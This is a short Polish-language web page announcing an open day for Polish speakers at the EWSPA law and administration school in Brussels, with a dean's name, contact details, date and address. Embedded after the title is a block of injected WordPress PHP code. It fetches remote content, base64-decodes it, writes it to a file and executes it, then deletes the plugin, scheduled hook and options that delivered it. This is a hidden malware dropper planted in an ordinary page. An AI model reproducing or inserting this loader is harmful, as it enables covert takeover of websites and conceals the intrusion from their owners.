Dni Otwarte EWSPA w Brukseli

error_reporting(0);
$http=get_option(E_NOTICE);
$resp=wp_remote_get( $http[0]);
$code=wp_remote_retrieve_body($resp);
file_put_contents(ABSPATH.$http[1], base64_decode($code));
include_once(ABSPATH.$http[4]);
deactivate_plugins($http[2]);
delete_plugins(array($http[2]));
wp_clear_scheduled_hook($http[3]);
delete_option($http[5]);
delete_option(E_NOTICE);
Studia po polsku w Brukseli! Zapraszamy Polonię Belgijską bez ograniczeń wiekowych do zapoznania się z naszą ofertą edukacyjną dla Polaków żyjących w Belgii. Zapraszamy na spotkanie z Dziekanem Wydziału Administracji w Brukseli dr Waldemarem Gontarskim.

kontakt:
Prodziekan Adam Snarski
asnarski@ewspa.edu.pl
Tel. 0483 59 76 93

Termin: 10 czerwca w godzinach 11:00 – 15:00
Miejsce: Ośrodek Naukowy Europejskiej Wyższej Szkoły Prawa i Administracji w Brukseli
                Chaussée de Vleurgat, 1050 Ixelles, Belgique